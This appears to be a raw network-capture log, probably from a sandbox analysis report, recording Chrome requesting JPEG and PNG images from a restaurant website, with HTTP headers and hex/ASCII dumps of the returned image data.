                                                                                                                                                    content-length: 157146
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: ff d8 ff e1 1b 40 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 31 30 3a 30 35 20 31 37 3a 31 39 3a 32 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: @ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:10:05 17:19:26
                                                                                                                                                    2024-10-01 04:26:55 UTC8192INData Raw: 78 6d 6c 6e 73 3a 64 63 3d 22 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65 6e 74 73 2f 31 2e 31 2f 22 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 31 36 37 34 39 62 65 2d 36 33 37 35 2d 31 31 65 65 2d 38 38 39 62 2d 39 65 31 64 38 34 61 34 36 32 34 66 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 64 37 65 36 65 65 36 33 2d 62 36 34 65
                                                                                                                                                    Data Ascii: xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:316749be-6375-11ee-889b-9e1d84a4624f" xmpMM:InstanceID="xmp.iid:d7e6ee63-b64e
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: eb c5 53 ce e9 5a bb 30 18 3a c7 37 af 5e e6 b0 42 ed 66 db fa fc 35 ea 73 4c 9d 9b dc 6d d8 6f 23 0f 57 8d 75 2f cc 41 3a fc 9a 5e 7a a4 42 16 8d 4d 13 d0 60 b3 38 10 d4 d2 8c 61 cb 42 4b fd 68 6e 02 a0 c5 72 ea d7 15 ac f2 3b 6b 16 8c 76 5b b3 5a 35 42 c6 dd 53 1f 56 49 3b 06 a0 8f cf 92 04 f0 f4 67 20 6a 59 6b c7 9d 09 02 a5 93 c1 0c 1b 09 77 32 5c 9e b2 3d 01 31 52 1d e6 cc f8 51 d0 f3 ba 09 f3 fa 18 b5 58 68 ca ba b5 4c 24 29 89 0b 75 c3 06 1a 8d ef 5e 0c e3 d7 6a ec e7 d8 8a 0e 4f 52 aa b6 86 5e 09 36 9a b9 f6 7a b1 f3 1c 7d 4d bb 2b f6 22 c4 10 69 09 67 72 35 de 96 5b a1 18 09 60 2c 29 62 50 c5 60 58 62 59 40 48 e4 30 08 52 a1 36 59 a4 87 0c da 00 f6 9d 53 27 5a c2 29 86 66 49 e8 d8 f6 65 2a a2 08 d5 ae e4 ea d9 2d 1e 82 4d 99 4c 41 0c 9b 31 21 9a
                                                                                                                                                    Data Ascii: SZ0:7^Bf5sLmo#Wu/A:^zBM`8aBKhnr;kv[Z5BSVI;g jYkw2\=1RQXhL$)u^jOR^6z}M+"igr5[`,)bP`XbY@H0R6YS'Z)fIe*-MLA1!
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: d4 b3 ef c9 f5 fa 39 4e 31 f5 84 7a 61 30 b4 53 09 8c 71 19 a0 30 08 a6 29 82 08 1c 19 f5 09 84 c0 20 33 30 18 4c 33 8c e5 39 4e 53 94 e5 f2 cd 03 42 f1 7e e0 81 be 58 c5 33 84 e1 39 72 95 eb 13 29 ab 10 c7 39 37 ec 70 1b 3b 24 c5 63 0a ca 4e 22 54 5c 26 b8 53 69 cc 51 16 13 33 01 80 40 91 47 03 ac fc 85 6f 07 dc fd e7 19 91 38 e7 e5 e8 8f 4c 68 4c 26 62 70 88 20 19 82 b9 e3 81 21 13 c5 09 84 c2 21 30 19 98 0c 13 94 e3 31 31 38 ce 33 13 11 84 02 18 af 88 61 69 ce 73 8a b9 8c b3 33 32 ad 4c 45 4e 33 33 f7 97 ed 85 9b 5b 7c a3 30 31 58 45 5c c5 aa 35 a1 55 98 b9 07 30 08 4c 58 0c 13 f6 9e 4c 42 39 4a 5f 84 fd a5 6f 16 5b 66 23 ef 99 ab b7 9f 9e 79 9c 33 1e 88 f5 43 54 2b 1e 06 95 34 6b b1 0b cf 24 e5 39 43 4c f0 43 44 29 3c 73 c7 38 ce 33 8c e3 02 cf 14 e3
                                                                                                                                                    Data Ascii: 9N1za0Sq0) 30L39NSB~X39r)97p;$cN"T\&SiQ3@Go8LhL&bp !!01183ais32LEN33[|01XE\5U0LXLB9J_o[f#y3CT+4k$9CLCD)<s83
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 41 2c b7 10 b6 61 10 08 16 26 b4 e1 89 e3 c4 30 ac 51 0b e2 5a 79 47 ae 04 81 23 3e 27 39 af 64 64 22 33 c6 52 b3 cf 0b ce 50 18 04 65 cc aa a9 e1 8e b8 8e 67 0c cf e9 66 51 ab 89 93 03 18 f5 f3 9c 38 43 74 37 40 c4 41 79 11 04 2f 89 63 83 38 03 11 27 8e 21 85 a5 61 63 b7 c6 26 ce b8 81 38 cd 55 c0 29 93 58 c0 da 31 ac cc 51 00 c4 0d 2b 5c ce 12 c3 31 15 61 48 ef 99 88 b1 a5 54 96 35 57 c0 11 98 89 89 73 c0 d0 7d 46 b3 10 ec 18 6f 8d 66 60 19 9e 4c c3 0c a5 f1 1a f2 d0 03 14 e6 70 81 20 aa 1a 71 08 c4 55 8a d8 9e 48 e6 5e 98 95 99 59 06 33 e2 1b 04 f2 88 5f 8c b6 ce 50 88 44 f3 09 e4 11 6d 8c f0 d0 62 50 60 4c 47 6c 45 31 9a 53 43 09 cb 10 3c 0d 0a 96 96 6a 99 5d 98 14 3e 4d ad 81 75 99 28 90 8c 40 d0 09 52 cb ac c4 68 27 1c 47 b3 10 46 6c 45 fb 95 51 98
                                                                                                                                                    Data Ascii: A,a&0QZyG#>'9dd"3RPegfQ8Ct7@Ay/c8'!ac&8U)X1Q+\1aHT5Ws}Fof`Lp qUH^Y3_PDmbP`LGlE1SC<j]>Mu(@Rh'GFlEQ
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: ee ce e7 a4 6c d4 97 d1 6e a5 c1 50 ca d3 ca de b1 f8 ea fd 81 a1 d7 6b 6a 53 75 da da b4 f5 9e e9 eb 3d 96 cf 61 ef fd 1e a3 db f9 0b b5 b4 d9 b9 bd d8 59 a1 4d 44 ea 6b 57 44 dd d8 ae b9 b7 b7 e4 94 25 8c 17 ec 6b 75 ba 7f db ec 7a 4a 94 77 3d 15 86 75 7d aa ee 51 57 70 d4 ef d3 b9 fd eb 7c 2d c2 ba 76 6b 1a cc e2 ba 75 e2 52 b4 d7 b3 b1 e5 65 a9 4a b1 fe 09 55 79 af 88 08 55 57 77 73 c6 34 f5 9a a2 ee c5 a8 fa 54 b1 4c 55 c4 b1 f8 be e5 8d 64 28 c6 ad 1d 55 a6 a4 ad 98 a5 6c 62 6b d6 13 8a 2c fc 85 67 4d b7 ea d5 f6 5b db b3 d3 ae 61 6f 57 fe 55 b6 ba c5 68 3c 50 50 b7 0d 4d 4b 54 af 10 0d cb 2f ec 3e ce fe cd 95 76 e7 c5 29 ec 17 72 9d ba 3f b3 4f b4 7b 67 79 d7 f6 7f fb a5 f8 6a 5c c5 a5 b0 9a d6 94 ab 49 b9 5b 5a 99 66 85 ac 7a 6d 05 eb 35 55 96 c1
                                                                                                                                                    Data Ascii: lnPkjSu=aYMDkWD%kuzJw=u}QWp|-vkuReJUyUWws4TLUd(Ulbk,gM[aoWUh<PPMKT/>v)r?O{gyj\I[Zfzm5U
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 67 8a ed cd cf f2 75 bd 3f 6d dc 6c 7a ef e0 8d ce cf ad d7 ea b7 ba 3e b2 a5 ed 75 75 b7 7d aa 8d de d7 bb ed 3b ce 8b b3 ed bf 21 f7 db 5d b6 ef 7d ec 9b a9 af d1 6c da fd 6f 4f 93 af ea 7d b6 db 69 fe 3c ec 04 f6 8e a5 ba 8e a7 ad fc 3f 5f 67 a7 bb f8 73 dc 35 27 fd 6d e8 fb 8e 9e 9a ac c9 db fe 2d cf 21 85 8a 54 a9 37 56 d5 90 ed 8d 54 66 b1 6d e2 bb dd 82 28 f6 0e f2 ba 47 e5 0f 6b b8 eb 9a fc 65 cf d5 35 3d 8e fb 8a 77 35 8a e7 f1 b7 ac 57 d9 76 7b f7 75 b6 75 ed f9 1f d7 35 07 43 eb 7d 18 ea d3 b2 aa 89 fd 9e c3 62 6b 76 b7 ed a3 fa ee ce db ff 00 d8 cf 48 57 f5 03 c4 8d 75 e9 5a ae c1 e8 2f 07 ef 95 13 5e ca 81 e9 35 b3 66 9e bd 76 57 ac 95 56 28 f1 13 f8 56 e5 af d8 a7 71 b7 9b 3b 1d 96 53 a3 77 25 08 b6 d6 fd 75 e2 1a d4 44 0b 0d d9 f8 09 5e 08
                                                                                                                                                    Data Ascii: gu?mlz>uu};!]}loO}i<?_gs5'm-!T7VTfm(Gke5=w5Wv{uu5C}bkvHWuZ/^5fvWV(Vq;Sw%uD^
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 2f 47 89 1f 4e d5 be 11 7c 25 ba 63 ba 49 8c 5d b1 2a 2b 38 55 59 a8 3c 29 dc f6 78 53 6a f4 52 3c 7a a8 b2 97 9c 78 49 36 9f 51 ee b5 61 84 a3 75 56 fb 83 9b 55 a7 f9 3e ab 4f 77 d4 b4 ec 23 37 b5 fb 50 fe f1 49 3c d0 3f 50 e8 f5 c3 d4 b4 ac 44 2c 3f bd 1c f1 2a b9 5c b6 3d 1d 60 66 ae ea 7b ce e1 e1 65 d8 ef f4 ac bd eb b5 d6 c5 b1 6d 55 a5 ca bb ab 12 d9 45 80 ae 5b 5f 2a 66 7a 5a b3 61 f4 2c 0a 8f b5 6c 7b 53 5e ec 4a ac b0 3b 95 aa ae 2b 69 26 67 64 da 7d 0c 2f 2c be 8c ad eb 12 0d 56 be 9a ad 58 e2 1a fc 30 f5 55 19 a8 3e 5a 19 5f 2f ec c1 1c 6f 5d 38 16 51 67 4e dc f2 31 2c d5 7b 97 ca cf b2 5a 5c 24 fd eb b3 18 fa 16 da 5a 29 e3 ae 03 cb eb 26 36 7c 25 98 56 9c 1c 5d e1 0f ce 54 93 00 83 65 47 34 85 ca 02 cb 18 37 62 63 a3 38 7d 98 be 6f 59 01 da
                                                                                                                                                    Data Ascii: /GN|%cI]*+8UY<)xSjR<zxI6QauVU>Ow#7PI<?PD,?*\=`f{emUE[_*fzZa,l{S^J;+i&gd}/,VX0U>Z_/o]8QgN1,{Z\$Z)&6|%V]TeG47bc8}oY
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: db 73 5b fa 6a 8d 23 62 ca 34 ec f5 55 6c 8a b6 d2 97 f7 f6 5d fe fa ae c7 21 de 5b 1d 55 9a 9b 15 7c 8d da b6 36 65 75 15 68 b8 56 d6 b5 76 e2 25 62 f7 94 b4 55 29 41 aa 65 56 4f b1 79 d7 0a ad 5a de 25 46 c4 4b 87 85 3d 5f 11 65 25 4a 39 f1 2a 3b 61 fa 13 d8 d6 08 e5 d8 be 7b a6 4a cf 11 38 8e ab 45 25 dc a9 47 c4 3c 7f bc 5f 33 d3 cd e1 d5 83 7f 33 d3 e5 7f 7d 11 7e 90 78 fc 9b 16 df ff 00 a1 ab a3 33 31 1b 5a e2 27 7e c5 2f 47 e8 93 3b 74 fa 90 ea b5 6c f6 f3 7c 31 78 3c 7f 68 a8 a9 45 de 9a ab 6b 3b 17 0b 32 06 78 d9 bc 49 dd ab 83 f1 ac b6 91 35 a3 bd 55 ef 9d e5 22 c3 b7 b9 33 3b 6d dd a2 a9 ef 36 1a 2c 1b 07 d2 aa 0e e5 b3 bd d3 ed a9 17 d5 5b 5f 0d 14 52 4d 74 7a ad 3b dd a3 d6 c4 fc bd 44 45 c4 24 08 cf fa 8c 6d 94 be 1f f5 36 86 3d ed df f5 0d
                                                                                                                                                    Data Ascii: s[j#b4Ul]![U|6euhVv%bU)AeVOyZ%FK=_e%J9*;a{J8E%G<_33}~x31Z'~/G;tl|1x<hEk;2xI5U"3;m6,[_RMtz;DE$m6=
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 86 4e 5e 29 2c e6 33 26 78 cf 0f 2f e3 66 ac 9e ae e7 a8 82 68 35 d3 34 59 64 18 de d4 f0 75 19 f5 1a 9d 30 47 2e a0 a3 13 f7 8e 50 c6 58 46 ff 00 1d a8 3a 97 4e 06 ea 1a 52 8e 33 9a 38 b1 4c 17 8d f9 77 c2 3b 54 27 d5 b5 3a 88 f4 f0 72 cb 4b 0c 60 46 26 57 65 f0 63 df 4f 04 71 c6 56 e5 b1 ca 4a 5f 71 11 11 1f c5 3f 1a 7b 37 71 5b bc eb 4d ae 85 a8 3a ed 3f bc 2d d7 92 1c 1f 99 6a 88 de 19 a6 e8 fd 2e 42 d3 c7 ab a6 18 c8 ca fe 5f 37 da 5c cd 3d ad 71 e1 a7 77 aa b4 b1 3b 60 9c c8 e6 37 c4 45 20 6f 5d ed 2a b9 50 07 31 27 83 4b b0 0b 7d f3 29 9b 54 4e 7a 9d 09 c7 0e 94 a3 6b 48 c4 c7 0c 76 86 72 c3 f9 48 f5 5a b1 ff 00 ee ba db 4b 51 fb b1 dd 8f ff 00 55 07 3e 66 8e e7 c2 35 c4 fe ce 74 6f a4 88 aa 5b c6 37 13 78 ad 41 3e b9 c8 a1 ae 11 3c 2b 97 04 04 66
                                                                                                                                                    Data Ascii: N^),3&x/fh54Ydu0G.PXF:NR38Lw;T':rK`F&WecOqVJ_q?{7q[M:?-j.B_7\=qw;`7E o]*P1'K})TNzkHvrHZKQU>f5to[7xA><+f


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    127192.168.2.449895162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC661OUTGET /assets/imgs/food_menu_extra.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:14 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 19306
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 33 08 06 00 00 00 cb aa 6b a7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f f4 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR<3kpHYs?iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:55 UTC2922INData Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22 3f 3e 84 e0 16 21 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 0a f0 49 44 41 54 78 da ec 5a 6b 8c 5d 57 75 fe d6 5a 7b 9f 73 ee dc 19 db 33 9e f8 1d d7 76 ec bc 08 58 d0 a4 a5 6a 1a 02 92 d5 44 88 44 25 7f a0 95 82 e8 0f 2a 9a aa 95 92 22 5a 24 04 aa d4 4a 09 a2 09 b4 72 ff 54 a8 6a 8b 22 11 45 a2 e2 21 4a 24 84 40 6d 54 04 94 14 ac b8 09 8f 50 62 e2 3c fc 98 f1 9d 3b e7 9c bd d7 5a fd 71 ef 1d 8f c7 8f b9 e3 b8 d8 2a de d2 99 f9 73 66 eb 7c 7b 7d df 5a df 5a 7b c8 dd f1 cb b4 18 bf 64 eb 2a e0 ff ef 2b d4 b9 bd e0 0b 44
                                                                                                                                                    Data Ascii: <?xpacket end="w"?>! cHRMz%u0`:o_FIDATxZk]WuZ{s3vXjDD%*"Z$JrTj"E!J$@mTPb<;Zq*sf|{}ZZ{d*+D


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    128192.168.2.449894162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC384OUTGET /assets/imgs/img_recipe_2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 21:27:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 199934
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16030INData Raw: ff d8 ff e1 11 71 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 01 f4 00 00 01 01 00 03 00 00 00 01 08 3d 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 37 3a 32 37 3a 31 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: qExifMM*=(1"2i$-'-'Adobe Photoshop CC 2015 (Windows)2023:09:27 17:27:16
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 14 00 03 ed cc 00 04 13 0b 00 03 5c 9e 00 00 00 01 58 59 5a 20 00 00 00 00 00 4c 09 56 00 50 00 00 00 57 1f e7 6d 65 61 73 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 8f 00 00 00 02 73 69 67 20 00 00 00 00 43 52 54 20 63 75 72 76 00 00 00 00 00 00 04 00 00 00 00 05 00 0a 00 0f 00 14 00 19 00 1e 00 23 00 28 00 2d 00 32 00 37 00 3b 00 40 00 45 00 4a 00 4f 00 54 00 59 00 5e 00 63 00 68 00 6d 00 72 00 77 00 7c 00 81 00 86 00 8b 00 90 00 95 00 9a 00 9f 00 a4 00 a9 00 ae 00 b2 00 b7 00 bc 00 c1 00 c6 00 cb 00 d0 00 d5 00 db 00 e0 00 e5 00 eb 00 f0 00 f6 00 fb 01 01 01 07 01 0d 01 13 01 19 01 1f 01 25 01 2b 01 32 01 38 01 3e 01 45 01 4c 01 52 01 59 01 60 01 67 01 6e 01 75 01 7c 01 83 01 8b 01 92 01 9a 01 a1 01 a9 01 b1 01 b9
                                                                                                                                                    Data Ascii: \XYZ LVPWmeassig CRT curv#(-27;@EJOTY^chmrw|%+28>ELRY`gnu|
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: de ac b9 0c c4 1e 03 c3 f6 be 2a b6 c3 e5 3c bf 24 b3 4d 1f 9a b6 ba 8d c4 1d 3c 29 b6 9d 45 5a 59 f6 fb be a0 f6 ff 00 52 9a 4c 9f 3f 14 b2 0e c2 3d 94 1e 26 d5 0f 2c 2f 3c fe 54 67 57 04 b8 e8 00 53 f9 86 3c 18 e5 a3 c4 42 b1 ae a7 73 5f b4 7c 2b 56 1c 92 34 c6 0d 21 16 76 17 27 a2 8e dd 2b 47 0b 0c 39 7e 47 c1 e9 f3 98 a6 57 dd b4 1b 2e de 14 26 62 7c 8b fc ac e7 6d fa 07 55 5c f2 7c e9 b1 5d 91 1b ee 98 de c7 a2 b3 5c ce 69 73 72 e5 c9 93 73 8b d9 0d b4 a5 6a 9b b8 b3 c2 e0 af 39 0b c0 78 f1 8b ab f0 62 08 1f 45 5a 37 37 5c 88 1a 46 2c ca ad e5 a8 03 bc de ea fd 4f 15 01 04 90 e2 45 1c a3 f9 e0 f6 81 1a 57 42 ef 97 92 8e 2c a0 02 22 55 e0 59 bb ff 00 f9 8d 51 d6 b6 6d da 70 bf d4 67 1c 17 2c b1 48 02 48 14 ed 1c 0f 45 6e fd 35 9d 04 b8 df 29 02 79 67
                                                                                                                                                    Data Ascii: *<$M<)EZYRL?=&,/<TgWS<Bs_|+V4!v'+G9~GW.&b|mU\|]\isrsj9xbEZ77\F,OEWB,"UYQmpg,HHEn5)yg
                                                                                                                                                    2024-10-01 04:26:55 UTC15252INData Raw: cf ba 61 e6 31 2c fd 24 d6 95 64 f2 8e 17 b7 a5 ea bc f2 99 1c d0 f9 83 cb 51 76 e0 3d b4 76 02 64 f3 07 64 63 66 da 15 81 f6 0f da a1 da e9 da b2 92 56 c2 f7 ba fc 6b f1 d4 58 b9 b2 61 cc 5c 5c 89 2e 1a fd 24 f8 be b5 1d d3 b5 61 73 e0 5f a7 b1 56 d0 f1 25 8c c1 b0 1b cb 7d 6c 2d c2 c6 97 97 95 c5 6f 3e 63 64 28 db 48 e9 37 a4 39 8b cc 65 59 72 81 db 10 00 6d d0 69 ef 7d 6a 5e 6d 99 8d 28 58 b1 14 58 0b 93 d1 f6 69 2a b2 ba bf e2 74 9b 9b 74 5c 32 ef d3 f8 a2 68 8c 92 0b ef b8 b9 d6 c4 9a 0b 3f 12 1c 19 5e 12 41 00 f1 5e 34 de 4d cc c7 92 70 d8 88 db 5b 13 d6 69 bc cd bc dc d5 c5 75 30 b2 22 82 58 81 bb c4 df fa 95 92 b4 d9 f9 ac ed fb 79 81 9e c6 e5 ad 24 96 7f 68 56 4b cd 97 89 e7 28 22 26 6b 5a e2 fa 7b cb 47 be 56 36 44 30 6e 91 80 45 ed a8 d0 82 07
                                                                                                                                                    Data Ascii: a1,$dQv=vddcfVkXa\\.$as_V%}l-o>cd(H79eYrmi}j^m(XXi*tt\2h?^A^4Mp[iu0"Xy$hVK("&kZ{GV6D0nE
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 12 45 b2 a3 76 0d c7 47 c2 b5 5d 8e 64 82 41 3c 56 27 c2 4e b6 02 b4 6b bf fc 70 ff 00 70 6a 89 a9 0d e6 53 9c 44 18 f8 ee db 08 b1 0d ad ad f1 55 e7 a6 72 21 5c bc 69 dc 84 d9 7b b1 d0 00 7e 2a cf 5f fa a4 bb e4 21 4d ef d4 2a 46 cf c5 84 fc bb 12 eb d2 57 bb 71 e0 a5 ae c9 a7 55 2d 39 06 f5 9a f5 67 ac e6 f2 9c 1e 79 1a cb 38 12 af 14 74 6e 16 f7 59 7b b5 2e 07 29 c5 e5 8a 53 19 2d f1 1d 4d 79 e7 24 e7 0f 8c cb 91 84 5e 38 d9 87 99 1d bb 2c 07 7e bd 1b 1f 2d 32 a3 59 a2 be c7 17 17 16 35 d8 d1 b6 bb 9b 76 51 64 71 b7 6b be 9f b6 7e d0 a2 6f c6 9b ba a2 2f 7a 4d d5 ab 93 3c 93 6e a6 92 05 45 ba bb 75 48 24 92 5e fc 29 29 94 a2 a2 5f 42 49 c0 00 77 58 6e b5 af 4b 5d 5c 2a 41 52 23 57 74 52 ed bd 3c 44 4d 12 45 36 42 41 a7 01 53 ac 1d 75 20 84 55 c0 32 0e
                                                                                                                                                    Data Ascii: EvG]dA<V'NkppjSDUr!\i{~*_!M*FWqU-9gy8tnY{.)S-My$^8,~-2Y5vQdqk~o/zM<nEuH$^))_BIwXnK]\*AR#WtR<DME6BASu U2
